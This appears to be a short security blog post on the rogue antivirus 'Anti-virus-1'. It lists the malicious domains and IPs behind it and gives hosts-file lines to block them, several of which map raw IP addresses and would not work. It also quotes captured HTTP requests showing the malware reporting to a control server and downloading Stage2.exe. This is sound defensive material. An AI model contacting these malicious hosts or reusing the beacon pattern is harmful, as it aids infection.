Block Anti-virus-1 malicious Domains

Anti-virus-1 is classified as a rogue security software, a false anti-spyware application that claims to be the best in removing trojans and in real it does nothing. Following there is a list of the malicious domains used to spread and promote Anti-virus-1:

1
2
3
4
5
6
7
8
9
70.38.19.201 (online-download-av1.info)
70.38.11.165 (gravicapa.globmail.org)
70.38.19.201 (online-site-av1.info)
67.205.75.10 (online-scanner-av1.info)
N/A              (antivirus1-site.info)
N/A              (antivirus1-download.info)
N/A              (av1-site.info)
N/A              (av1-download.info)
N/A              (av1-scanner.info)

To block the above domains and IPs you can edit the Windows Hosts File that is located in C:\WINDOWS\system32\drivers\etc\hosts and adds these lines:

127.0.0.1 70.38.19.201
127.0.0.1 online-site-av1.info
127.0.0.1 online-download-av1.info
127.0.0.1 70.38.11.165
127.0.0.1 gravicapa.globmail.org
127.0.0.1 antivirus1-site.info
127.0.0.1 antivirus1-download.info
127.0.0.1 av1-site.info
127.0.0.1 av1-download.info
127.0.0.1 online-scanner-av1.info
127.0.0.1 67.205.75.10
127.0.0.1 av1-scanner.info

With these changes, you will redirect all the domains and IPs to 127.0.0.1 (localhost) and the trojans will not be able to download the malicious .EXE file from the above listed domains.

Internet traffic on port 80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
GET /admin/cgi-bin/get_domain.php?type=site HTTP/1.1
User-Agent: AV1
Host: 70.38.11.165
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
 
GET /collection.php?step=AV19_GetId_failure&id=none HTTP/1.1
User-Agent: AV1i
Host: online-site-av1.info
Connection: Keep-Alive
Cache-Control: no-cache
 
GET /collection.php?step=AV19_stage_one_complete&id=none HTTP/1.1
User-Agent: AV1i
Host: online-site-av1.info
Connection: Keep-Alive
Cache-Control: no-cache
 
GET /en/exe/Stage2.exe HTTP/1.1
User-Agent: AV1i
Host: online-download-av1.info
Connection: Keep-Alive
Cache-Control: no-cache
 
GET /admin/cgi-bin/get_domain.php?type=site HTTP/1.1
User-Agent: AV1
Host: 70.38.11.165
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

Random Posts

Previous Posts